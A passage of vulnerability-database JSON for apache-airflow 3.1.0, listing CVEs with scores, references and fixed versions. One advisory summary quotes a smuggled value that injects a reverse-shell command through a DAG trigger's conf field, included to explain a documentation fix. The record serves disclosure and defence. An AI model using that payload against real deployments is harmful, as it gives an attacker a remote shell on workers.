"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-06-01T12:52:50Z/" } ], "url": "https://github.com/apache/airflow/pull/66673" }, { "reference_url": "https://lists.apache.org/thread/r2q93dg2wp5h9sd9vh6y4y5ljqd9crdd", "reference_id": "r2q93dg2wp5h9sd9vh6y4y5ljqd9crdd", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-06-01T12:52:50Z/" } ], "url": "https://lists.apache.org/thread/r2q93dg2wp5h9sd9vh6y4y5ljqd9crdd" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/93948?format=api", "purl": "pkg:pypi/apache-airflow@3.2.2", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/apache-airflow@3.2.2" } ], "aliases": [ "BIT-airflow-2026-45192", "CVE-2026-45192", "PYSEC-2026-173" ], "risk_score": 3.0, "exploitability": "0.5", "weighted_severity": "5.9", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-vxqr-wyq5-6yge" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/70373?format=api", "vulnerability_id": "VCID-xga6-ksvc-9yhf", "summary": "Apache Airflow's official documentation at `core-concepts/dag-run.html` (\"Passing Parameters when triggering Dags\") showed a verbatim `BashOperator(bash_command=\"echo value: {{ dag_run.conf['conf1'] }}\")` example without any quoting / sanitization warning. Dag authors who copied the pattern verbatim into deployments where users had `Dag.can_trigger` permission on the affected Dag (typical multi-team deployments, hosted offerings exposing a trigger API) could be exposed to shell-metacharacter injection via the `conf` field of the trigger API: an authenticated trigger user could supply `\"; bash -i >& /dev/tcp/.../9999 0>&1; #\"` as a `conf` value and reach an `os.exec` on the worker. This CVE covers the documentation correction in `apache/airflow` PR 64129 — the pattern in the docs example now includes explicit shell-quoting and a safety caveat. Affects deployments whose Dag code was modeled on the pre-correction docs example. Same class as the prior CVE-2025-50213 and CVE-2025-27018 documentation-pattern fixes. Users are advised to upgrade to `apache-airflow` 3.2.2 or later to pick up the corrected documentation shipped with the release.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42252", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00067", "scoring_system": "epss", "scoring_elements": "0.20955", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00067", "scoring_system": "epss", "scoring_elements": "0.21131", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42252" }, { "reference_url": "https://github.com/apache/airflow/pull/64129", "reference_id": "64129", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-06-02T16:05:01Z/" } ], "url": "https://github.com/apache/airflow/pull/64129" }, { "reference_url": "https://lists.apache.org/thread/8f4sc0rfn154jprmnwtmlst4p9zfw3w7", "reference_id": "8f4sc0rfn154jprmnwtmlst4p9zfw3w7", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-06-02T16:05:01Z/" } ], "url": "https://lists.apache.org/thread/8f4sc0rfn154jprmnwtmlst4p9zfw3w7" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/93948?format=api", "purl": "pkg:pypi/apache-airflow@3.2.2", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/apache-airflow@3.2.2" } ], "aliases": [ "BIT-airflow-2026-42252", "CVE-2026-42252", "PYSEC-2026-184" ], "risk_score": 4.1, "exploitability": "0.5", "weighted_severity": "8.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-xga6-ksvc-9yhf" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/74948?format=api", "vulnerability_id": "VCID-yvkr-2un4-cyfg", "summary": "Apache Airflow versions 3.0.0 through 3.1.8 DagRun wait endpoint returns XCom result values even to users who only have DAG Run read permissions, such as the Viewer role.This behavior conflicts with the FAB RBAC model, which treats XCom as a separate protected resource, and with the security model documentation that defines the Viewer role as read-only.\n\nAirflow uses the FAB Auth Manager to manage access control on a per-resource basis. The Viewer role is intended to be read-only by default, and the security model documentation defines Viewer users as those who can inspect DAGs without accessing sensitive execution results.\n\nUsers are recommended to upgrade to Apache Airflow 3.2.0 which resolves this issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34538", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02407", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02404", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34538" }, { "reference_url": "https://github.com/advisories/GHSA-r7vr-m4jw-r794", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-r7vr-m4jw-r794" }, { "reference_url": "https://github.com/apache/airflow", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/apache/airflow" }, { "reference_url": "https://github.com/apache/airflow/releases/tag/3.2.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/apache/airflow/releases/tag/3.2.0" }, { "reference_url": "https://github.com/pypa/advisory-database/tree/main/vulns/apache-airflow/PYSEC-2026-21.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pypa/advisory-database/tree/main/vulns/apache-airflow/PYSEC-2026-21.yaml" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34538", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34538" }, { "reference_url": "http://www.openwall.com/lists/oss-security/2026/04/09/9", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "http://www.openwall.com/lists/oss-security/2026/04/09/9" }, { "reference_url": "https://github.com/apache/airflow/pull/64415", "reference_id": "64415", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-09T14:05:44Z/" } ], "url": "https://github.com/apache/airflow/pull/64415" }, { "reference_url": "https://lists.apache.org/thread/9mq3msqhmgjwdzbr6bgthj4brb3oz9fl", "reference_id": "9mq3msqhmgjwdzbr6bgthj4brb3oz9fl", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-09T14:05:44Z/" } ], "url": "https://lists.apache.org/thread/9mq3msqhmgjwdzbr6bgthj4brb3oz9fl" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/92193?format=api", "purl": "pkg:pypi/apache-airflow@3.2.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2j7p-89b9-t7e8" }, { "vulnerability": "VCID-7nmp-wvjt-5qcd" }, { "vulnerability": "VCID-8aa5-hyy9-e3f1" }, { "vulnerability": "VCID-9y7c-yxq4-f7ha" }, { "vulnerability": "VCID-es5x-ee29-6ue8" }, { "vulnerability": "VCID-f5rh-fhtd-wyau" }, { "vulnerability": "VCID-h4r7-k7z1-6kgg" }, { "vulnerability": "VCID-r4gm-ygr6-4ffs" }, { "vulnerability": "VCID-tbn8-rdjn-nban" }, { "vulnerability": "VCID-tx59-fvt4-mbfj" }, { "vulnerability": "VCID-vxqr-wyq5-6yge" }, { "vulnerability": "VCID-xga6-ksvc-9yhf" }, { "vulnerability": "VCID-y78u-y824-afc4" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/apache-airflow@3.2.0" } ], "aliases": [ "BIT-airflow-2026-34538", "CVE-2026-34538", "GHSA-r7vr-m4jw-r794", "PYSEC-2026-21" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-yvkr-2un4-cyfg" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/102690?format=api", "vulnerability_id": "VCID-z2uv-jktt-87c7", "summary": "User with CREATE and no UPDATE privilege for Pools, Connections, Variables could update existing records via bulk create API with overwrite action.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-62503", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00229", "scoring_system": "epss", "scoring_elements": "0.45981", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00229", "scoring_system": "epss", "scoring_elements": "0.45836", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-62503" }, { "reference_url": "https://github.com/apache/airflow", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/apache/airflow" }, { "reference_url": "https://lists.apache.org/thread/ov923dyccwbv01v9mhcv7t7ykzobycfo", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://lists.apache.org/thread/ov923dyccwbv01v9mhcv7t7ykzobycfo" }, { "reference_url": "http://www.openwall.com/lists/oss-security/2025/10/29/8", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "http://www.openwall.com/lists/oss-security/2025/10/29/8" }, { "reference_url": "https://lists.apache.org/thread/3v58249qscyn1hg240gh8hqg9pb4okcr", "reference_id": "3v58249qscyn1hg240gh8hqg9pb4okcr", "reference_type": "", "scores": [ { "value": "4.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-30T14:25:35Z/" } ], "url": "https://lists.apache.org/thread/3v58249qscyn1hg240gh8hqg9pb4okcr" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62503", "reference_id": "CVE-2025-62503", "reference_type": "", "scores": [ { "value": "4.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62503" }, { "reference_url": "https://github.com/advisories/GHSA-gp5f-cx7h-8q6f", "reference_id": "GHSA-gp5f-cx7h-8q6f", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-gp5f-cx7h-8q6f" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/34926?format=api", "purl": "pkg:pypi/apache-airflow@3.1.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2j7p-89b9-t7e8" }, { "vulnerability": "VCID-4n4v-jv1f-1bgk" }, { "vulnerability": "VCID-5r2q-cc18-v7cx" }, { "vulnerability": "VCID-7q3b-su3j-y7b4" }, { "vulnerability": "VCID-881f-vbac-rucw" }, { "vulnerability": "VCID-8aa5-hyy9-e3f1" }, { "vulnerability": "VCID-9y7c-yxq4-f7ha" }, { "vulnerability": "VCID-ap8j-6689-kfgd" }, { "vulnerability": "VCID-bftx-1hw8-z7f1" }, { "vulnerability": "VCID-bkwd-x3qh-57ga" }, { "vulnerability": "VCID-bva2-dpg3-m7hv" }, { "vulnerability": "VCID-es5x-ee29-6ue8" }, { "vulnerability": "VCID-f41w-9d6d-wbgf" }, { "vulnerability": "VCID-f5rh-fhtd-wyau" }, { "vulnerability": "VCID-gbn8-8y8d-gkgw" }, { "vulnerability": "VCID-h4r7-k7z1-6kgg" }, { "vulnerability": "VCID-nz83-fzzb-5ucs" }, { "vulnerability": "VCID-r2bq-ukcr-1fa3" }, { "vulnerability": "VCID-srr5-3rxv-rkg8" }, { "vulnerability": "VCID-szqt-j7av-dqde" }, { "vulnerability": "VCID-tbn8-rdjn-nban" }, { "vulnerability": "VCID-ttb5-juj4-uugt" }, { "vulnerability": "VCID-tx59-fvt4-mbfj" }, { "vulnerability": "VCID-typh-t13h-w3g1" }, { "vulnerability": "VCID-u2bm-499h-2qfh" }, { "vulnerability": "VCID-vnaq-tba8-ykag" }, { "vulnerability": "VCID-vxqr-wyq5-6yge" }, { "vulnerability": "VCID-xga6-ksvc-9yhf" }, { "vulnerability": "VCID-yvkr-2un4-cyfg" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/apache-airflow@3.1.1" } ], "aliases": [ "CVE-2025-62503", "GHSA-gp5f-cx7h-8q6f" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-z2uv-jktt-87c7" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/129148?format=api", "vulnerability_id": "VCID-z7rt-fxe3-3udw", "summary": "Improper Input Validation vulnerability in the Apache Airflow Sqoop Provider.\n\nThis issue affects Apache Airflow Sqoop Provider versions before 3.1.1.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-25693", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.03621", "scoring_system": "epss", "scoring_elements": "0.88109", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.03621", "scoring_system": "epss", "scoring_elements": "0.88069", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-25693" }, { "reference_url": "https://github.com/apache/airflow", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/apache/airflow" }, { "reference_url": "https://github.com/pypa/advisory-database/tree/main/vulns/apache-airflow/PYSEC-2023-314.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pypa/advisory-database/tree/main/vulns/apache-airflow/PYSEC-2023-314.yaml" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-25693", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-25693" }, { "reference_url": "https://github.com/apache/airflow/pull/29500", "reference_id": "29500", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-13T14:26:37Z/" } ], "url": "https://github.com/apache/airflow/pull/29500" }, { "reference_url": "https://lists.apache.org/thread/79qn8g5xbq036f8crb115obvr22l52q4", "reference_id": "79qn8g5xbq036f8crb115obvr22l52q4", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-13T14:26:37Z/" } ], "url": "https://lists.apache.org/thread/79qn8g5xbq036f8crb115obvr22l52q4" }, { "reference_url": "https://github.com/advisories/GHSA-j69x-v4wc-3fpf", "reference_id": "GHSA-j69x-v4wc-3fpf", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-j69x-v4wc-3fpf" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/34926?format=api", "purl": "pkg:pypi/apache-airflow@3.1.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2j7p-89b9-t7e8" }, { "vulnerability": "VCID-4n4v-jv1f-1bgk" }, { "vulnerability": "VCID-5r2q-cc18-v7cx" }, { "vulnerability": "VCID-7q3b-su3j-y7b4" }, { "vulnerability": "VCID-881f-vbac-rucw" }, { "vulnerability": "VCID-8aa5-hyy9-e3f1" }, { "vulnerability": "VCID-9y7c-yxq4-f7ha" }, { "vulnerability": "VCID-ap8j-6689-kfgd" }, { "vulnerability": "VCID-bftx-1hw8-z7f1" }, { "vulnerability": "VCID-bkwd-x3qh-57ga" }, { "vulnerability": "VCID-bva2-dpg3-m7hv" }, { "vulnerability": "VCID-es5x-ee29-6ue8" }, { "vulnerability": "VCID-f41w-9d6d-wbgf" }, { "vulnerability": "VCID-f5rh-fhtd-wyau" }, { "vulnerability": "VCID-gbn8-8y8d-gkgw" }, { "vulnerability": "VCID-h4r7-k7z1-6kgg" }, { "vulnerability": "VCID-nz83-fzzb-5ucs" }, { "vulnerability": "VCID-r2bq-ukcr-1fa3" }, { "vulnerability": "VCID-srr5-3rxv-rkg8" }, { "vulnerability": "VCID-szqt-j7av-dqde" }, { "vulnerability": "VCID-tbn8-rdjn-nban" }, { "vulnerability": "VCID-ttb5-juj4-uugt" }, { "vulnerability": "VCID-tx59-fvt4-mbfj" }, { "vulnerability": "VCID-typh-t13h-w3g1" }, { "vulnerability": "VCID-u2bm-499h-2qfh" }, { "vulnerability": "VCID-vnaq-tba8-ykag" }, { "vulnerability": "VCID-vxqr-wyq5-6yge" }, { "vulnerability": "VCID-xga6-ksvc-9yhf" }, { "vulnerability": "VCID-yvkr-2un4-cyfg" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/apache-airflow@3.1.1" } ], "aliases": [ "CVE-2023-25693", "GHSA-j69x-v4wc-3fpf", "PYSEC-2023-314" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-z7rt-fxe3-3udw" } ], "fixing_vulnerabilities": [], "risk_score": "4.5", "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/apache-airflow@3.1.0" }